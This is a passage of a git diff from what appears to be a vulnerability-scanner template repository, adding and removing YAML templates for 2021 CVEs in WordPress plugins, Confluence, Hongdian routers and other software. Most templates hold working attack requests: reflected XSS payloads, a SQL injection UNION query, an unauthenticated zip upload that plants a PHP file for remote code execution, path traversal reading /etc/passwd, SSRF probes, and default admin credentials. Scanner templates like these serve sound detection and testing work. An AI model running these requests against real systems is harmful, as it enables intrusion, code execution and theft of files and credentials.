------WebKitFormBoundaryIYl2Oz8ptq5OMtbU - Content-Disposition: form-data; name="comment_parent" - - 0 - ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU-- - - | - GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1 - Host: {{Hostname}} - req-condition: true - matchers: - - type: word - part: body_2 - words: - - "CVE-2021-24236" diff --git a/poc/cve/cve-2021-24275-5661.yaml b/poc/cve/cve-2021-24275-5661.yaml deleted file mode 100644 index 89211570dd..0000000000 --- a/poc/cve/cve-2021-24275-5661.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2021-24275 -info: - name: Popup by Supsystic < 1.10.5 - Reflected Cross-Site scripting (XSS) - author: dhiyaneshDK - severity: medium - description: The Popup by Supsystic WordPress plugin before 1.10.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue. - reference: - - https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24275 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-24275 - cwe-id: CWE-79 - tags: wordpress,cve,cve2021,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - '' - condition: and - - type: status - status: - - 200 - - type: word - words: - - "text/html" - part: header diff --git a/poc/cve/cve-2021-24284(1).yaml b/poc/cve/cve-2021-24284(1).yaml deleted file mode 100644 index f2e969c7a6..0000000000 --- a/poc/cve/cve-2021-24284(1).yaml +++ /dev/null @@ -1,62 +0,0 @@ -id: CVE-2021-24284 -info: - name: WordPress Kaswara Modern VC Addons - File Upload RCE - author: lamscun,pussycat0x,pdteam - severity: critical - description: | - The Kaswara Modern VC Addons WordPress plugin through 3.0.1 allows unauthenticated arbitrary file upload via the 'uploadFontIcon' AJAX action. The supplied zipfile being unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP. - reference: - - https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5 - - https://github.com/advisories/GHSA-wqvg-8q49-hjc7 - - https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/ - - https://www.waltermairena.net/en/2021/04/25/0-day-vulnerability-in-the-plugin-kaswara-modern-vc-addons-plugin-what-can-i-do/ - - https://lifeinhex.com/kaswara-exploit-or-how-much-wordfence-cares-about-user-security/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-24284 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-24284 - cwe-id: CWE-434 - tags: cve,cve2021,wordpress,wp-plugin,rce,wp,intrusive,unauth,fileupload -variables: - zip_file: "{{to_lower(rand_text_alpha(6))}}" - php_file: "{{to_lower(rand_text_alpha(2))}}.php" - php_cmd: "" -requests: - - raw: - - | - POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=------------------------d3be34324392a708 - - --------------------------d3be34324392a708 - Content-Disposition: form-data; name="fonticonzipfile"; filename="{{zip_file}}.zip" - Content-Type: application/octet-stream - - {{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}} - --------------------------d3be34324392a708 - Content-Disposition: form-data; name="fontsetname" - - {{zip_file}} - --------------------------d3be34324392a708 - Content-Disposition: form-data; name="action" - - uploadFontIcon - --------------------------d3be34324392a708-- - - | - GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1 - Host: {{Hostname}} - req-condition: true - matchers-condition: and - matchers: - - type: word - part: body_1 - words: - - "wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css" - - type: word - part: body_2 - words: - - "phpinfo()" - - type: status - status: - - 200 diff --git a/poc/cve/cve-2021-24285-5673.yaml b/poc/cve/cve-2021-24285-5673.yaml deleted file mode 100644 index af2df857a4..0000000000 --- a/poc/cve/cve-2021-24285-5673.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2021-24285 -info: - name: Car Seller - Auto Classifieds Script WordPress plugin SQLI - author: ShreyaPohekar - severity: critical - description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue. - tags: cve,cve2021,wordpress,wp-plugin,sqli - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-24285 - - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/ - - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2021-24285 - cwe-id: CWE-89 -requests: - - raw: - - | - POST /wp-admin/admin-ajax.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq" - part: body diff --git a/poc/cve/cve-2021-24286(1).yaml b/poc/cve/cve-2021-24286(1).yaml deleted file mode 100644 index 44f7dffcf1..0000000000 --- a/poc/cve/cve-2021-24286(1).yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: CVE-2021-24286 -info: - name: Redirect 404 to Parent < 1.3.1 - Reflected Cross-Site Scripting - author: geeknik - description: The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue - reference: https://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27 - severity: medium - tags: cve,cve2021,xss -requests: - - method: GET - path: - - "{{BaseURL}}/wp-admin/options-general.php?page=moove-redirect-settings&tab=\" onMouseOver=\"alert(1);" - matchers-condition: and - matchers: - - type: word - words: - - "\" onMouseOver=\"alert(1);" - - type: word - part: header - words: - - "text/html" diff --git a/poc/cve/cve-2021-24335-5703.yaml b/poc/cve/cve-2021-24335-5703.yaml new file mode 100644 index 0000000000..3fb28432a1 --- /dev/null +++ b/poc/cve/cve-2021-24335-5703.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-24335 +info: + name: Car Repair Services < 4.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The Car Repair Services & Auto Mechanic WordPress theme before 4.0 did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-24335 + - https://themeforest.net/item/car-repair-services-auto-mechanic-wordpress-theme/19823557 + - https://m0ze.ru/vulnerability/[2021-02-12]-[WordPress]-[CWE-79]-Car-Repair-Services-WordPress-Theme-v3.9.txt + - https://wpscan.com/vulnerability/39258aba-2449-4214-a490-b8e46945117d + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24335 + cwe-id: CWE-79 + tags: cve,cve2021,wordpress,xss,wp-plugin +requests: + - method: GET + path: + - '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/cve/cve-2021-24364-5721.yaml b/poc/cve/cve-2021-24364-5721.yaml new file mode 100644 index 0000000000..c4c6eeebd2 --- /dev/null +++ b/poc/cve/cve-2021-24364-5721.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-24364 +info: + name: Jannah < 5.4.4 (XSS) + author: pikpikcu + severity: medium + description: The Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability. + reference: + - https://wpscan.com/vulnerability/1d53fbe5-a879-42ca-a9d3-768a80018382 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24364 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24364 + cwe-id: CWE-79 + tags: cve,cve2021,wordpress,xss,wp-theme +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D' + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/cve/cve-2021-24488(1).yaml b/poc/cve/cve-2021-24488(1).yaml new file mode 100644 index 0000000000..258fbbb072 --- /dev/null +++ b/poc/cve/cve-2021-24488(1).yaml @@ -0,0 +1,40 @@ +id: CVE-2021-24488 +info: + name: WordPress Plugin Post Grid < 2.1.8 - XSS + author: cckuailong + severity: medium + description: The slider import search feature and tab parameter of the Post Grid WordPress plugin before 2.1.8 settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues + reference: + - https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a + - https://nvd.nist.gov/vuln/detail/CVE-2021-24488 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24488 + cwe-id: CWE-79 + tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(document.domain)// HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'value="\"onmouseover=alert(document.domain)/">' + - 'Post Grid' + condition: and + - type: status + status: + - 200 diff --git a/poc/cve/cve-2021-24498-5751.yaml b/poc/cve/cve-2021-24498-5751.yaml deleted file mode 100644 index 16b53e0f1e..0000000000 --- a/poc/cve/cve-2021-24498-5751.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2021-24498 -info: - name: Calendar Event Multi View < 1.4.01 - Unauthenticated Reflected Cross-Site Scripting (XSS) - author: suman_kar - description: The plugin does not sanitise or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php), leading to a reflected Cross-Site Scripting issue. - severity: medium - tags: cve,cve2021,xss,wordpress,wp-plugin - reference: https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86 -requests: - - raw: - - | - GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 - Connection: close - matchers-condition: and - matchers: - - type: word - words: - - '><' - - 'Calendar Details' - part: body - condition: and - - type: word - words: - - 'text/html' - part: header - - type: status - status: - - 200 diff --git a/poc/cve/cve-2021-24838-5769.yaml b/poc/cve/cve-2021-24838-5769.yaml deleted file mode 100644 index abc53d31b1..0000000000 --- a/poc/cve/cve-2021-24838-5769.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2021-24838 -info: - name: AnyComment <= 0.2.21 - Open Redirect - author: noobexploiter - severity: medium - description: The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature. - reference: - - https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82 - - https://nvd.nist.gov/vuln/detail/CVE-2021-24838 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-24838 - cwe-id: CWE-601 - tags: cve,cve2021,wordpress,wp-plugin,open-redirect -requests: - - method: GET - path: - - "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com" - matchers-condition: and - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - - type: status - status: - - 302 diff --git a/poc/cve/cve-2021-25033(1).yaml b/poc/cve/cve-2021-25033(1).yaml deleted file mode 100644 index 5348a3bb8c..0000000000 --- a/poc/cve/cve-2021-25033(1).yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2021-25033 -info: - name: Noptin < 1.6.5 - Open Redirect - author: dhiyaneshDk - severity: medium - description: Noptin < 1.6.5 is susceptible to an open redirect vulnerability. The plugin does not validate the "to" parameter before redirecting the user to its given value, leading to an open redirect issue. - reference: - - https://wpscan.com/vulnerability/c2d2384c-41b9-4aaf-b918-c1cfda58af5c - - https://plugins.trac.wordpress.org/changeset/2639592 - - https://nvd.nist.gov/vuln/detail/CVE-2021-25033 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-25033 - cwe-id: CWE-601 - tags: cve,cve2021,wordpress,redirect,wp-plugin,noptin,wp -requests: - - method: GET - path: - - "{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh" - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by mp on 2022/04/13 diff --git a/poc/cve/cve-2021-25075(1).yaml b/poc/cve/cve-2021-25075(1).yaml deleted file mode 100644 index c3af39b163..0000000000 --- a/poc/cve/cve-2021-25075(1).yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2021-25075 -info: - name: WordPress Duplicate Page or Post < 1.5.1 - Stored XSS - author: DhiyaneshDK - severity: low - description: | - The plugin does not have any authorisation and has a flawed CSRF check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin's settings, or perform such attack via CSRF. Furthermore, due to the lack of escaping, this could lead to Stored Cross-Site Scripting issues. - remediation: Fixed in version 1.5.1. - reference: - - https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N - cvss-score: 3.50 - cve-id: CVE-2021-25075 - cwe-id: CWE-862 - tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | - POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - action=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p - - | - GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "style=animation-name:rotation onanimationstart=alert(/XSS/) p" - - "toplevel_page_wpda_duplicate_post_menu" - condition: and - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/cve/cve-2021-25085(1).yaml b/poc/cve/cve-2021-25085(1).yaml new file mode 100644 index 0000000000..6dae7e423c --- /dev/null +++ b/poc/cve/cve-2021-25085(1).yaml @@ -0,0 +1,37 @@ +id: CVE-2021-25085 +info: + name: WOOF WordPress plugin - Reflected Cross-Site Scripting + author: Maximus Decimus + severity: medium + description: | + The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting. + reference: + - https://wpscan.com/vulnerability/b7dd81c6-6af1-4976-b928-421ca69bfa90 + - https://plugins.trac.wordpress.org/changeset/2648751 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25085 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-25085 + metadata: + verified: true + tags: cve,cve2021,wordpress,wp-plugin,wp,xss +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=" + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"additional_fields":[""]}' + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + +# Enhanced by cs 06/21/2022 diff --git a/poc/cve/cve-2021-25118(1).yaml b/poc/cve/cve-2021-25118(1).yaml new file mode 100644 index 0000000000..f037f16c59 --- /dev/null +++ b/poc/cve/cve-2021-25118(1).yaml @@ -0,0 +1,39 @@ +id: CVE-2021-25118 +info: + name: Yoast SEO < 17.3 - Path Disclosure + author: DhiyaneshDK + severity: medium + description: The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints which could help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities. + reference: + - https://wpscan.com/vulnerability/2c3f9038-632d-40ef-a099-6ea202efb550 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25118 + - https://plugins.trac.wordpress.org/changeset/2608691 + remediation: Fixed in version 17.3 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-25118 + cwe-id: CWE-200 + tags: wordpress,cve2021,wp-plugin,fpd,cve,wp +requests: + - method: GET + path: + - "{{BaseURL}}/wp-json/wp/v2/posts?per_page=1" + matchers-condition: and + matchers: + - type: regex + regex: + - '"path":"(.*)/wp-content\\(.*)","size' + - type: word + part: header + words: + - "application/json" + - type: status + status: + - 200 + extractors: + - type: regex + part: body + group: 1 + regex: + - '"path":"(.*)/wp-content\\(.*)","size' diff --git a/poc/cve/cve-2021-26085(1).yaml b/poc/cve/cve-2021-26085(1).yaml new file mode 100644 index 0000000000..f2032f23ff --- /dev/null +++ b/poc/cve/cve-2021-26085(1).yaml @@ -0,0 +1,34 @@ +id: CVE-2021-26085 +info: + name: Confluence Pre-Authorization Arbitrary File Read in /s/ endpoint - CVE-2021-26085 + author: princechaddha + severity: medium + description: Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. + reference: + - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-26085 + - https://jira.atlassian.com/browse/CONFSERVER-67893 + - http://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-26085 + cwe-id: CWE-862 + metadata: + shodan-query: http.component:"Atlassian Confluence" + tags: cve,cve2021,confluence,atlassian,lfi,kev +requests: + - method: GET + path: + - "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - "Confluence" + - "com.atlassian.confluence.setup.ConfluenceAppConfig" + condition: and diff --git a/poc/cve/cve-2021-27519(1).yaml b/poc/cve/cve-2021-27519(1).yaml deleted file mode 100644 index 97b1350cae..0000000000 --- a/poc/cve/cve-2021-27519(1).yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2021-27519 -info: - name: FUDForum 3.1.0 - Reflected XSS - author: kh4sh3i - severity: medium - description: | - A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript - reference: - - https://www.exploit-db.com/exploits/49942 - - https://nvd.nist.gov/vuln/detail/CVE-2021-27519 - - https://github.com/fudforum/FUDforum/issues/2 - - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-27519 - cwe-id: CWE-79 - metadata: - shodan-query: 'http.html:"Powered by: FUDforum"' - verified: "true" - tags: cve,cve2021,xss,fudforum -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?SQ=0&srch=x"+onmouseover%3Dalert%281%29+x%3D"&t=search&btn_submit.x=0&btn_submit.y=0' - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'highlightSearchTerms("x" onmouseover=alert(1) x="");' - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/cve/cve-2021-27748(1).yaml b/poc/cve/cve-2021-27748(1).yaml new file mode 100644 index 0000000000..23f9aef7c7 --- /dev/null +++ b/poc/cve/cve-2021-27748(1).yaml @@ -0,0 +1,33 @@ +id: CVE-2021-27748 +info: + name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery + author: pdteam + severity: high + description: | + IBM WebSphere HCL Digital Experience is susceptible to server-side request forgery vulnerability that impacts on-premise deployments and containers. + reference: + - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/ + - https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748 + classification: + cve-id: CVE-2021-27748 + metadata: + verified: true + shodan-query: http.html:"IBM WebSphere Portal" + tags: cve,cve2021,hcl,ibm,ssrf,websphere +requests: + - method: GET + path: + - '{{BaseURL}}/docpicker/internal_proxy/http/interact.sh' + - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh' + redirects: true + max-redirects: 2 + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "Interactsh Server" + - type: status + status: + - 200 diff --git a/poc/cve/cve-2021-28149-5943.yaml b/poc/cve/cve-2021-28149-5943.yaml deleted file mode 100644 index 18c48fcc12..0000000000 --- a/poc/cve/cve-2021-28149-5943.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2021-28149 -info: - name: Hongdian Directory Traversal - author: gy741 - severity: medium - description: | - Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file. - reference: - - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-28149 - - http://en.hongdian.com/Products/Details/H8922 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.5 - cve-id: CVE-2021-28149 - cwe-id: CWE-22 - tags: cve,cve2021,hongdian,traversal -requests: - - raw: - - | - GET /log_download.cgi?type=../../etc/passwd HTTP/1.1 - Host: {{Hostname}} - Cache-Control: max-age=0 - Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - - | - GET /log_download.cgi?type=../../etc/passwd HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic YWRtaW46YWRtaW4= - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "application/octet-stream" - part: header - - type: regex - regex: - - "root:.*:0:0:" - - "sshd:[x*]" - - "root:[$]" - part: body diff --git a/poc/cve/cve-2021-28150-5949.yaml b/poc/cve/cve-2021-28150-5949.yaml deleted file mode 100644 index 41e5c3d5da..0000000000 --- a/poc/cve/cve-2021-28150-5949.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2021-28150 -info: - name: Hongdian Sensitive Information - author: gy741 - severity: medium - description: Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi. - reference: - - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 - tags: cve,cve2021,hongdian,exposure - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.50 - cve-id: CVE-2021-28150 - cwe-id: CWE-20 -requests: - - raw: - - | - GET /backup2.cgi HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - - | - GET /backup2.cgi HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic YWRtaW46YWRtaW4= - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "application/octet-stream" - part: header - - type: word - words: - - "CLI configuration saved from vty" - - "service webadmin" - part: body diff --git a/poc/cve/cve-2021-28377(1).yaml b/poc/cve/cve-2021-28377(1).yaml new file mode 100644 index 0000000000..d55e6fcef0 --- /dev/null +++ b/poc/cve/cve-2021-28377(1).yaml @@ -0,0 +1,27 @@ +id: CVE-2021-28377 +info: + name: ChronoForums 2.0.11 - Directory Traversal + author: 0x_Akoko + severity: medium + description: The ChronoForums avatar function is vulnerable through unauthenticated path traversal attacks. This enables unauthenticated attackers to read arbitrary files, for example the Joomla! configuration file which contains credentials. + reference: + - https://herolab.usd.de/en/security-advisories/usd-2021-0007/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-28377 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-28377 + cwe-id: CWE-22 + tags: cve,cve2021,chronoforums,lfi,joomla +requests: + - method: GET + path: + - "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 diff --git a/poc/cve/cve-2021-28918-5975.yaml b/poc/cve/cve-2021-28918-5975.yaml new file mode 100644 index 0000000000..a28e3035b4 --- /dev/null +++ b/poc/cve/cve-2021-28918-5975.yaml @@ -0,0 +1,37 @@ +id: CVE-2021-28918 +info: + name: Netmask NPM Package - Server-Side Request Forgery + author: johnjhacking + severity: critical + description: Netmask NPM Package is susceptible to server-side request forgery because of improper input validation of octal strings in netmask npm package. This allows unauthenticated remote attackers to perform indeterminate SSRF, remote file inclusion, and local file inclusion attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. + reference: + - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md + - https://github.com/advisories/GHSA-pch5-whg9-qr2r + - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 + - https://github.com/rs/node-netmask + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 + cve-id: CVE-2021-28918 + cwe-id: CWE-20 + tags: cve,cve2021,npm,netmask,ssrf,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/?url=http://0177.0.0.1/server-status" + - "{{BaseURL}}/?host=http://0177.0.0.1/server-status" + - "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd" + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - "Apache Server Status" + - "Server Version" + condition: and + - type: regex + regex: + - "root:.*:0:0:" + +# Enhanced by mp on 2022/05/17 diff --git a/poc/cve/cve-2021-29490-6011.yaml b/poc/cve/cve-2021-29490-6011.yaml new file mode 100644 index 0000000000..b9b3a7d41b --- /dev/null +++ 